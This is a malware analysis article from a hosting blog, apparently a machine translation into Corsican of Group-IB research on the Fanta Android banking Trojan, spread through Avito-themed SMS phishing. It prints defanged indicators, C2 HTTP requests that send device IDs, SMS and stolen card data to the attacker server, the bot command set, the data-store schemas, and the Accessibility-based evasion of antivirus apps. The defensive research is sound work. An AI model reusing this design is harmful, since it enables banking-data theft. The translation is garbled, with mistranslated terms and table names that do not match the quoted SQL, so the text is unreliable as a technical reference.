ProHoster > Blog > nutizie internet > Leysya, Fanta: una nova tattica per un vechju Trojan Android

Leysya, Fanta: una nova tattica per un vechju Trojan Android

Leysya, Fanta: una nova tattica per un vechju Trojan Android

Un ghjornu vulete vende qualcosa in Avito è, dopu avè publicatu una descrizzione dettagliata di u vostru pruduttu (per esempiu, un modulu RAM), riceverete stu missaghju:

Leysya, Fanta: una nova tattica per un vechju Trojan AndroidUna volta apre u ligame, vi vede una pagina apparentemente innocua chì vi avvisà, u venditore felice è successu, chì una compra hè stata fatta:

Leysya, Fanta: una nova tattica per un vechju Trojan Android
Na vota ca vo cliccate nant'à u buttone "Cuntinuà", un schedariu APK cù un icona è un nomu fiducia-inspiring sarà telecaricatu à u vostru aparechju Android. Avete installatu una applicazione chì per una certa ragione dumandava i diritti di AccessibilityService, dopu apparsu un paru di finestri è sparivanu rapidamente è... Eccu.

Andate à verificà u vostru equilibriu, ma per una certa ragione a vostra app bancaria dumanda di novu i dati di a vostra carta. Dopu avè intrutu in i dati, succede qualcosa di terribili: per una certa ragione ùn hè micca chjaru per voi, i soldi cumincianu à sparisce da u vostru contu. Pruvate di risolve u prublema, ma u vostru telefunu resiste: pressu i tasti "Back" è "Home", ùn si spegne micca è ùn vi permette micca di attivà e misure di sicurezza. In u risultatu, vi restate senza soldi, i vostri beni ùn sò micca acquistati, vi sò cunfusi è dumandate: ciò chì hè accadutu?

A risposta hè simplice: avete diventatu una vittima di u Trojan Fanta Android, un membru di a famiglia Flexnet. Cumu hè accadutu questu? Spieghemu avà.

Autori: Andrey Polovinkin, junior specialista in l'analisi di malware, Ivan Pisarev, specialista in l'analisi di malware.

Arcuni statìstichi

A famiglia Flexnet di troiani Android hè stata cunnisciuta per a prima volta in 2015. Duranti un piriudu longu di attività, a famiglia si stende à parechji subspecies: Fanta, Limebot, Lipton, etc. U Trojan, cum'è l'infrastruttura assuciata à questu, ùn si ferma micca: novi schemi di distribuzione efficaci sò sviluppati - in u nostru casu, pagine di phishing d'alta qualità destinate à un utilizatore-venditore specificu, è i sviluppatori Trojan seguenu i tendenzi di moda in scrittura di virus - aghjunghjendu una nova funziunalità chì permette di arrubà più efficacimente soldi da i dispositi infettati è i meccanismi di prutezzione.

A campagna descritta in questu articulu hè destinata à l'utilizatori di Russia; un picculu numeru di dispusitivi infettati sò stati registrati in Ucraina, è ancu menu in Kazakhstan è Bielorussia.

Ancu s'è Flexnet hè stata in l'arena di Troia Android per più di 4 anni è hè stata studiata in dettagliu da parechji circadori, hè sempre in bona forma. A partesi da ghjennaghju 2019, a quantità potenziale di danni hè più di 35 milioni di rubli - è questu hè solu per e campagne in Russia. In u 2015, diverse versioni di stu troianu Android sò stati venduti in fori sotterranei, induve u codice fonte di u troianu cù una descrizzione detallata puderia ancu esse truvatu. Questu significa chì e statistiche di danni in u mondu sò ancu più impressiunanti. Ùn hè micca un malu indicatore per un omu cusì vechju, ùn hè micca?

Leysya, Fanta: una nova tattica per un vechju Trojan Android

Da a vendita à l'ingannimentu

Comu pò esse vistu da a screenshot presentata prima di una pagina di phishing per u serviziu di Internet per publicà annunzii Avito, hè stata preparata per una vittima specifica. Apparentemente, l'attaccanti utilizanu unu di i parsers di Avito, chì estrae u numeru di telefunu è u nome di u venditore, è ancu a descrizzione di u produttu. Dopu l'espansione di a pagina è a preparazione di u schedariu APK, a vittima hè mandata un SMS cù u so nome è un ligame à una pagina di phishing chì cuntene una descrizzione di u so pruduttu è a quantità ricevuta da a "vendita" di u pruduttu. Cliccà nant'à u buttone, l 'utilizatori riceve un schedariu APK maliziusi - Fanta.

Un studiu di u duminiu shcet491[.]ru hà dimustratu chì hè delegatu à i servitori DNS di Hostinger:

  • ns1.hostinger.ru
  • ns2.hostinger.ru
  • ns3.hostinger.ru
  • ns4.hostinger.ru

U schedariu di zona di duminiu cuntene entrate chì puntanu à l'indirizzi IP 31.220.23[.]236, 31.220.23[.]243, è 31.220.23[.]235. In ogni casu, u registru di risorsa primaria di u duminiu (A record) punta à un servitore cù l'indirizzu IP 178.132.1[.]240.

L'indirizzu IP 178.132.1[.]240 si trova in i Paesi Bassi è appartene à l'hoster. WorldStream. L'indirizzi IP 31.220.23[.]235, 31.220.23[.]236 è 31.220.23[.]243 sò situati in u Regnu Unitu è ​​appartenenu à u servitore di hosting cumuni HOSTINGER. Adupratu cum'è un registratore openprov-ru. I duminii seguenti sò ancu risolti à l'indirizzu IP 178.132.1[.]240:

  • sdelka-ru[.]ru
  • tovar-av[.]ru
  • av-tovar[.]ru
  • ru-sdelka[.]ru
  • shcet382[.]ru
  • sdelka221[.]ru
  • sdelka211[.]ru
  • vyplata437[.]ru
  • viplata291[.]ru
  • perevod273[.]ru
  • perevod901[.]ru

Si deve esse nutatu chì i ligami in u seguente formatu eranu dispunibili da quasi tutti i domini:

http://(www.){0,1}<%domain%>/[0-9]{7}

Stu mudellu include ancu un ligame da un messagiu SMS. Basatu nantu à e dati storichi, hè stata truvata chì un duminiu currisponde à parechji ligami in u mudellu descrittu sopra, chì indica chì un duminiu hè stata utilizata per distribuisce u Trojan à parechje vittimi.

Andemu un pocu avanti: u troianu scaricatu via un ligame da un SMS usa l'indirizzu cum'è un servitore di cuntrollu onusedseddohap[.]club. Stu duminiu hè statu registratu u 2019-03-12, è à partesi da u 2019-04-29, l'applicazioni APK interagiscenu cù stu duminiu. Basatu nantu à e dati ottenuti da VirusTotal, un totale di 109 applicazioni interagiscenu cù stu servitore. U duminiu stessu risolviu à l'indirizzu IP 217.23.14[.]27, situatu in i Paesi Bassi è pussede da l'hoster WorldStream. Adupratu cum'è un registratore namecheap. I duminii sò ancu risolti à questu indirizzu IP bad-racoon[.]club (à partesi da u 2018-09-25) è bad-racoon[.]live (à partesi da u 2018-10-25). Cù duminiu bad-racoon[.]club più di 80 schedari APK interazzione cù bad-racoon[.]live - più di 100.

In generale, l'attaccu avanza cusì:

Leysya, Fanta: una nova tattica per un vechju Trojan Android

Chì ci hè sottu à u coperchio di Fanta ?

Cum'è parechji altri troiani Android, Fanta hè capaci di leghje è mandà missaghji SMS, fà richieste USSD, è affissà e so propiu finestri nantu à l'applicazioni (cumprese quelli bancari). Tuttavia, l'arsenale di funziunalità di sta famiglia hè ghjuntu: Fanta hà cuminciatu à aduprà Serviziu d'accessibilità per diversi scopi: leghje u cuntenutu di e notificazioni da altre applicazioni, impediscenu a rilevazione è piantà l'esekzione di un Trojan in un dispositivu infettatu, etc. Fanta funziona in tutte e versioni di Android micca più ghjovani di 4.4. In questu articulu, daremu un ochju più vicinu à u seguente campione Fanta:

  • MD5: 0826bd11b2c130c4c8ac137e395ac2d4
  • SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
  • SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Immediatamente dopu à u lanciu

Immediatamente dopu à u lanciu, u Troia oculta a so icona. L'applicazione pò travaglià solu se u nome di u dispusitivu infettatu ùn hè micca in a lista:

  • android_x86
  • VirtualBox
  • Nexus 5X (bullhead)
  • Nexus 5 (rasoio)

Stu cuntrollu hè realizatu in u serviziu principale di u Trojan - MainService. Quandu lanciata per a prima volta, i paràmetri di cunfigurazione di l'applicazione sò inizializzati à i valori predeterminati (u furmatu per almacenà e dati di cunfigurazione è u so significatu seranu discututi dopu), è un novu dispositivu infettatu hè registratu in u servitore di cuntrollu. Una dumanda HTTP POST cù u tipu di messagiu serà mandatu à u servitore register_bot è infurmazione nantu à u dispusitivu infettatu (versione Android, IMEI, numeru telefonu, nome operatore è codice di u paese in quale l'operatore hè registratu). L'indirizzu serve cum'è u servitore di cuntrollu hXXp://onuseseddohap[.]club/controller.php. In risposta, u servitore manda un missaghju chì cuntene i campi bot_id, bot_pwd, servore - l'applicazione salva questi valori cum'è parametri di u servitore CnC. Parametru servore opzionale se u campu ùn hè statu ricevutu: Fanta usa l'indirizzu di registrazione - hXXp://onuseseddohap[.]club/controller.php. A funzione di cambià l'indirizzu CnC pò esse aduprata per risolve dui prublemi: per distribuisce a carica uniformemente trà parechji servitori (cù un gran numaru di dispusitivi infettati, a carica nantu à un servitore web senza ottimizzazione pò esse alta), è ancu aduprà una alternativa. server in casu di fallimentu di unu di i servitori CnC.

Se si verifica un errore durante l'inviu di a dumanda, u Trojan ripetirà u prucessu di registrazione dopu à 20 seconde.

Una volta chì u dispusitivu hè statu arregistratu bè, Fanta mostrarà u missaghju seguente à l'utilizatore:

Leysya, Fanta: una nova tattica per un vechju Trojan Android
Nota impurtante: u serviziu chjamatu Sicurezza di u sistema - u nome di u serviziu di Troia, è dopu cliccà u buttone OK Una finestra si apre cù i paràmetri di Accessibilità di u dispositivu infettatu, induve l'utilizatore deve cuncede i diritti di Accessibilità per u serviziu maliziusu:

Leysya, Fanta: una nova tattica per un vechju Trojan Android
Appena l'utilizatore si accende Serviziu d'accessibilità, Fanta accede à u cuntenutu di e finestre di l'applicazione è l'azzioni realizate in elli:

Leysya, Fanta: una nova tattica per un vechju Trojan Android
Immediatamente dopu avè ricivutu i diritti d'accessibilità, u Trojan richiede i diritti di l'amministratore è i diritti per leghje e notificazioni:

Leysya, Fanta: una nova tattica per un vechju Trojan Android
Utilizendu u Serviziu d'accessibilità, l'applicazione simula i tasti di tasti, dendu cusì tutti i diritti necessarii.

Fanta crea parechje istanze di basa di dati (chì saranu descritte più tardi) necessarii per almacenà e dati di cunfigurazione, è dinò l'infurmazioni raccolte in u prucessu nantu à u dispusitivu infettatu. Per mandà l'infurmazioni raccolte, u Trojan crea un compitu ripetutu pensatu per scaricà campi da a basa di dati è riceve un cumandamentu da u servitore di cuntrollu. L'intervallu per accede à CnC hè stabilitu secondu a versione Android: in u casu di 5.1, l'intervallu serà 10 seconde, altrimente 60 seconde.

Per riceve u cumandamentu, Fanta face una dumanda GetTask à u servitore di gestione. In risposta, CnC pò mandà unu di i seguenti cumandamenti:

squadra discrizzione
0 Mandate un missaghju SMS
1 Fate una telefonata o cumanda USSD
2 Aghjurnate un paràmetru intervallu
3 Aghjurnate un paràmetru intercetta
6 Aghjurnate un paràmetru smsManager
9 Cumincià à cullà i missaghji SMS
11 Resetta u vostru telefunu à i paràmetri di fabbrica
12 Attivà / Disattivà a registrazione di a creazione di a finestra di dialogu

Fanta raccoglie ancu notifiche da 70 app bancari, sistemi di pagamentu veloci è e-wallets è li guarda in una basa di dati.

Salvà i paràmetri di cunfigurazione

Per almacenà i parametri di cunfigurazione, Fanta usa un approcciu standard per a piattaforma Android - Preferenze- i schedari. I paràmetri seranu salvati in un schedariu chjamatu iventi. A descrizzione di i paràmetri salvati hè in a tavola sottu.

nomu Valore predeterminatu I valori pussibuli discrizzione
id 0 Integer ID di u bot
servore hXXp://onuseseddohap[.]club/ URL L'indirizzu di u servitore di cuntrollu
pwd - String Password di u servitore
intervallu 20 Integer Intervallu di tempu. Indica quantu tempu i seguenti compiti duveranu esse differiti:

  • Quandu mandà una dumanda nantu à u statutu di un missaghju SMS mandatu
  • Riceve un novu cumandamentu da u servitore di gestione
intercetta tuttu all/telNumber Se u campu hè uguali à a stringa tuttu o telNumber, allura u messagiu SMS ricevutu sarà interceptatu da l'applicazione è micca mostratu à l'utilizatore
smsManager 0 0/1 Attivà / disattivà l'applicazione cum'è u destinatariu SMS predeterminatu
leghjeDialog sbagliate Veru/falsu Attivà / Disattivà a registrazione di l'avvenimenti Eventu d'accessibilità

Fanta usa ancu u schedariu smsManager:

nomu Valore predeterminatu I valori pussibuli discrizzione
pckg - String Nome di u gestore di messagi SMS utilizatu

Interazzione cù basa di dati

Duranti u so funziunamentu, u Trojan usa dui basa di dati. Database chjamatu a utilizatu per almacenà diverse informazioni raccolte da u telefunu. A seconda basa di dati hè chjamata fantasia.db è hè utilizatu per salvà i paràmetri rispunsevuli di creà finestre di phishing pensate per cullà infurmazioni nantu à e carte bancarie.

Trojan usa a basa di dati а per almacenà l'infurmazioni raccolte è logà e vostre azzioni. I dati sò guardati in una tavola FIRMA. Per creà una tabella, utilizate a seguente query SQL:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

A basa di dati cuntene l'infurmazioni seguenti:

1. Logging u startup di u dispusitivu nfittati cù un missaghju U telefuninu s'accende !

2. Notificazioni da l'applicazioni. U missaghju hè generatu secondu u mudellu seguente:

(<%App Name%>)<%Title%>: <%Notification text%>

3. Dati di a carta bancaria da e forme di phishing create da u Troia. Parametru VIEW_NAME pò esse unu di i seguenti:

  • AliExpress
  • Avito
  • Google Play
  • Miscellaneous <%App Name%>

U missaghju hè registratu in u furmatu:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. Missaghji SMS entranti / isciutu in u furmatu:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. Informazioni nantu à u pacchettu chì crea a finestra di dialogu in u formatu:

(<%Package name%>)<%Package information%>

Tavola d'esempiu FIRMA:

Leysya, Fanta: una nova tattica per un vechju Trojan Android
Una di e funziunalità di Fanta hè a cullizzioni di informazioni nantu à e carte bancarie. A raccolta di dati si faci per a creazione di finestre di phishing quandu si apre l'applicazioni bancarie. U Trojan crea a finestra di phishing solu una volta. L'infurmazione chì a finestra hè stata mostrata à l'utilizatore hè guardata in una tavula iventi in a basa di dati fantasia.db. Per creà una basa di dati, utilizate a seguente query SQL:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

Tutti i campi di a tavola iventi per difettu inizializatu à 1 (create una finestra di phishing). Dopu chì l'utilizatore inserisce i so dati, u valore serà stabilitu à 0. Esempiu di campi di tavula iventi:

  • can_login - u campu hè rispunsevuli di visualizà a forma quandu apre una applicazione bancaria
  • prima_banca - micca usatu
  • can_avitu - u campu hè rispunsevuli di visualizà u furmulariu quandu apre l'applicazione Avito
  • can_ali - u campu hè rispunsevuli di visualizà a forma quandu apre l'applicazione Aliexpress
  • pò_altru - u campu hè rispunsevuli di visualizà u furmulariu quandu apre ogni applicazione da a lista: Yula, Pandao, Drom Auto, Wallet. Carte sconti è bonus, Aviasales, Booking, Trivago
  • can_card - u campu hè rispunsevuli di visualizà a forma quandu apre Google Play

Interazzione cù u servitore di gestione

L'interazzione di a rete cù u servitore di gestione si faci via u protocolu HTTP. Per travaglià cù a reta, Fanta usa a famosa biblioteca di Retrofit. E dumande sò mandate à: hXXp://onuseseddohap[.]club/controller.php. L'indirizzu di u servitore pò esse cambiatu quandu si registra in u servitore. I cookies ponu esse mandati in risposta da u servitore. Fanta fa e seguenti dumande à u servitore:

  • A registrazione di u bot in u servitore di cuntrollu hè una volta, à u primu lanciu. I seguenti dati nantu à u dispositivu infettatu sò mandati à u servitore:
    · Marco - cookies ricevuti da u servitore (u valore predeterminatu hè una stringa viota)
    · modu - custanti di corda register_bot
    · prefissu - custante intera 2
    · versione_sdk - hè furmatu secondu u mudellu seguente: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
    · imei - IMEI di u dispusitivu infettatu
    · paese - codice di u paese in u quale l'operatore hè registratu, in furmatu ISO
    · nùmeru - numeru di telefonu
    · operatore - nome di l'operatore

    Un esempiu di una dumanda mandata à u servitore:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>

    In risposta à a dumanda, u servitore deve rinvià un oggettu JSON chì cuntene i seguenti parametri:
    · bot_id - ID di u dispusitivu infettatu. Se bot_id hè uguale à 0, Fanta ri-eseguirà a dumanda.
    bot_pwd - password per u servitore.
    servitore - cuntrollu di l'indirizzu di u servitore. Parametru facultativu. Se u paràmetru ùn hè micca specificatu, l'indirizzu salvatu in l'applicazione serà utilizatu.

    Esempiu d'ughjettu JSON:

    {
    "response":[
   	 {
   		 "bot_id": <%BOT_ID%>,
   		 "bot_pwd": <%BOT_PWD%>,
   		 "server": <%SERVER%>
   	 }
    ],
    "status":"ok"
}

  • Richiesta di riceve un cumandamentu da u servitore. I seguenti dati sò mandati à u servitore:
    · Marco - cookies ricevuti da u servitore
    · lignu - ID di u dispusitivu infettatu chì hè statu ricevutu quandu invià a dumanda register_bot
    · pwd - password per u servitore
    · divice_admin - u campu determina se i diritti di amministratore sò stati ottenuti. Se i diritti di amministratore sò stati ottenuti, u campu hè uguali à 1, altrimenti 0
    · di Licodia - Statu di u funziunamentu di u serviziu di l'accessibilità. Se u serviziu hè statu cuminciatu, u valore hè 1, altrimenti 0
    · SMSManager - mostra se u Trojan hè attivatu cum'è l'applicazione predeterminata per riceve SMS
    · schermu - mostra in quale statu hè u screnu. U valore serà stabilitu 1, se u screnu hè nantu, altrimenti 0;

    Un esempiu di una dumanda mandata à u servitore:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

    Sicondu u cumandamentu, u servitore pò rinvià un oggettu JSON cù diversi parametri:

    · squadra Mandate un missaghju SMS: I paràmetri cuntenenu u numeru di telefunu, u testu di u messagiu SMS è l'ID di u missaghju mandatu. L'identificatore hè utilizatu per mandà un missaghju à u servitore cù u tipu setSmsStatus. 

    {
    "response":
    [
   	 {
   		 "mode": 0,
   		 "sms_number": <%SMS_NUMBER%>,
   		 "sms_text": <%SMS_TEXT%>,
   		 "sms_id": %SMS_ID%
   	 }
    ],
    "status":"ok"
}

    · squadra Fate una telefonata o cumanda USSD: U numeru di telefunu o cumanda vene in u corpu di risposta. 

    {
    "response":
    [
   	 {
   		 "mode": 1,
   		 "command": <%TEL_NUMBER%>
   	 }
    ],
    "status":"ok"
}

    · squadra Cambia u paràmetru di l'intervallu. 

    {
    "response":
    [
   	 {
   		 "mode": 2,
   		 "interval": <%SECONDS%>
   	 }
    ],
    "status":"ok"
}

    · squadra Cambia u paràmetru di intercettazione. 

    {
    "response":
    [
   	 {
   		 "mode": 3,
   		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
   	 }
    ],
    "status":"ok"
}

    · squadra Cambia u campu di SMSManager. 

    {
    "response":
    [
   	 {
   		 "mode": 6,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}

    · squadra Cullate missaghji SMS da un dispositivu infettatu.

    {
    "response":
    [
   	 {
   		 "mode": 9
   	 }
    ],
    "status":"ok"
}

    · squadra Resetta u vostru telefunu à i paràmetri di fabbrica: 

    {
    "response":
    [
   	 {
   		 "mode": 11
   	 }
    ],
    "status":"ok"
}

    · squadra Cambia u paràmetru ReadDialog. 

    {
    "response":
    [
   	 {
   		 "mode": 12,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}

  • Mandendu un missaghju cù u tipu setSmsStatus. Questa dumanda hè fatta dopu chì u cumandamentu hè eseguitu Mandate un missaghju SMS. A dumanda s'assumiglia cusì:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

  • Caricà u cuntenutu di a basa di dati. Una fila hè trasmessa per dumanda. I seguenti dati sò mandati à u servitore:
    · Marco - cookies ricevuti da u servitore
    · modu - custanti di corda setSaveInboxSms
    · lignu - ID di u dispusitivu infettatu chì hè statu ricevutu quandu invià a dumanda register_bot
    · u testu - testu in u registru attuale di a basa di dati (campu d da a tavula FIRMA in a basa di dati а)
    · nùmeru - nome di u registru attuale di a basa di dati (campu p da a tavula FIRMA in a basa di dati а)
    · sms_mode - valore integer (campu m da a tavula FIRMA in a basa di dati а)

    A dumanda s'assumiglia cusì:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

    Se mandatu successu à u servitore, a fila serà sguassata da a tavula. Esempiu di un oggettu JSON restituitu da u servitore:

    {
    "response":[],
    "status":"ok"
}

Interagisce cù AccessibilityService

AccessibilityService hè statu implementatu per fà i dispositi Android più faciule d'utilizà per e persone cù disabilità. In a maiò parte di i casi, l'interazzione fisica hè necessaria per interagisce cù una applicazione. AccessibilityService vi permette di fà li programmatically. Fanta utilizza u serviziu per creà finestri falsi in l'applicazioni bancarie è impedisce à l'utilizatori di apre i paràmetri di u sistema è alcune applicazioni.

Utilizendu a funziunalità di l'AccessibilityService, u Trojan monitors cambiamenti à elementi nantu à a pantalla di u dispusitivu infettatu. Comu descrittu prima, i paràmetri di Fanta cuntenenu un paràmetru rispunsevule per l'operazioni di logu cù scatuli di dialogu - leghjeDialog. Se stu paràmetru hè stabilitu, l'infurmazioni nantu à u nome è a descrizzione di u pacchettu chì hà attivatu l'avvenimentu serà aghjuntu à a basa di dati. U Trojan esegue e seguenti azzioni quandu l'avvenimenti sò attivati:

  • Simula a pressione di i tasti back è home in i seguenti casi:
    · s'è l 'utilizatore voli rilancià u so dispusitivu
    · se l'utilizatore vole sguassà l'applicazione "Avito" o cambià i diritti d'accessu
    · se ci hè una menzione di l'applicazione "Avito" in a pagina
    · quandu apre l'applicazione Google Play Protect
    · quandu apre e pagine cù i paràmetri di AccessibilityService
    · quandu a finestra di dialogu di Sicurezza di u Sistema appare
    · quandu apre a pagina cù i paràmetri "Draw over other app".
    · quandu apre a pagina "Applicazioni", "Recovery and reset", "Data reset", "Reset settings", "Developer panel", "Special. opportunità", "Oportunità speciali", "diritti speciali"
    · se l'avvenimentu hè statu generatu da certe applicazioni.

    Lista di applicazioni

    • Applicazioni
    • Maestru Lite
    • Clean Master
    • Clean Master per CPU x86
    • Gestione di permessi di l'applicazione Meizu
    • Sicurezza MIUI
    • Clean Master - Antivirus & Cache è Garbage Cleaner
    • Cuntrolli parentali è GPS: Kaspersky SafeKids
    • Kaspersky Antivirus AppLock & Web Security Beta
    • Virus Cleaner, Antivirus, Cleaner (MAX Security)
    • Mobile AntiVirus Security PRO
    • Antivirus Avast è prutezzione gratuita 2019
    • Mobile Security MegaFon
    • Prutezzione AVG per Xperia
    • Sicurezza Mobile
    • Antivirus è prutezzione Malwarebytes
    • Antivirus per Android 2019
    • Security Master - Antivirus, VPN, AppLock, Booster
    • Antivirus AVG per u Manager di sistema di tablette Huawei
    • Samsung Accessibilità
    • Samsung Smart Manager
    • Maestru di Sicurezza
    • Booster di Velocità
    • dr.web
    • Spaziu di Sicurezza Dr.Web
    • Dr.Web Mobile Control Center
    • Dr.Web Security Space Life
    • Dr.Web Mobile Control Center
    • Antivirus è Securità Mobile
    • Kaspersky Internet Security: Antivirus è Prutezzione
    • Durata di a Batteria di Kaspersky: Risparmio è Booster
    • Kaspersky Endpoint Security - prutezzione è gestione
    • AVG Antivirus free 2019 - Prutezzione per Android
    • Antivirus Android
    • Norton Mobile Security è Antivirus
    • Antivirus, firewall, VPN, sicurezza mobile
    • Sicurezza Mobile: antivirus, VPN, prutezzione di furtu
    • Antivirus per Android

  • Se u permessu hè dumandatu quandu invià un missaghju SMS à un numeru cortu, Fanta simula cliccà nantu à a casella di cuntrollu Ricurdate a scelta è buttone mandà.
  • Quandu pruvate di caccià i diritti di l'amministratore da u Trojan, chjude u screnu di u telefunu.
  • Impedisce l'aghjunghje novi amministratori.
  • Se l'applicazione antivirus dr.web rilevatu una minaccia, Fanta imita pressu u buttone ignurà.
  • U Trojan simula pressu u buttone di ritornu è di casa se l'avvenimentu hè statu generatu da l'applicazione Cura di u dispositivu Samsung.
  • Fanta crea finestre di phishing cù forme per inserisce infurmazioni nantu à e carte bancarie se una applicazione da una lista di circa 30 servizii Internet differenti hè stata lanciata. Frà elli: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto, etc.

    Forme di phishing

    Fanta analizeghja quali applicazioni sò in esecuzione nantu à u dispositivu infettatu. Se una applicazione d'interessu hè stata aperta, u Troia mostra una finestra di phishing sopra à tutti l'altri, chì hè una forma per inserisce l'infurmazioni di a carta bancaria. L'utilizatore deve inserisce i seguenti dati:

    • Numeru di carta
    • Data di scadenza di a carta
    • CVV
    • Nome di u titularu di a carta (micca per tutte e banche)

    Sicondu l'applicazione in esecuzione, diverse finestre di phishing seranu mostrate. Quì sottu sò esempi di alcuni di elli:

    Aliexpress:

    Leysya, Fanta: una nova tattica per un vechju Trojan Android
    Avitu:

    Leysya, Fanta: una nova tattica per un vechju Trojan Android
    Per alcune altre applicazioni, p.e. Google Play Market, Aviasales, Pandao, Booking, Trivago:
    Leysya, Fanta: una nova tattica per un vechju Trojan Android

    Cumu era veramente

    Fortunatamente, a persona chì hà ricivutu u missaghju SMS descritta à l'iniziu di l'articulu hè statu un specialista in cibersigurtà. Per quessa, a versione vera, non-direttore hè differente da quellu chì hà dettu prima: una persona hà ricevutu un SMS interessante, dopu chì l'hà datu à a squadra di l'Intelligenza di Caccia di Minaccia di Group-IB. U risultatu di l'attaccu hè questu articulu. Finale felice, nò? Tuttavia, micca tutti i stori finiscinu cusì successu, è cusì chì u vostru ùn pare micca un tagliu di direttore cù una perdita di soldi, in a maiò parte di i casi, hè abbastanza per aderisce à e seguenti regule longu descritte:

    • ùn installate micca l'applicazioni per un dispositivu mobile cù u sistema operativo Android da qualsiasi fonti altru chè Google Play
    • Quandu stallate una applicazione, fate una attenzione particulari à i diritti dumandati da l'applicazione
    • fate attenzione à l'estensione di i schedari telecaricati
    • stallà l'aghjurnamenti di u sistema operativo Android regularmente
    • ùn visitate micca risorse sospette è ùn scaricate micca i schedari da quì
    • Ùn cliccate micca nantu à i ligami ricevuti in i missaghji SMS.

Source: www.habr.com

Add a comment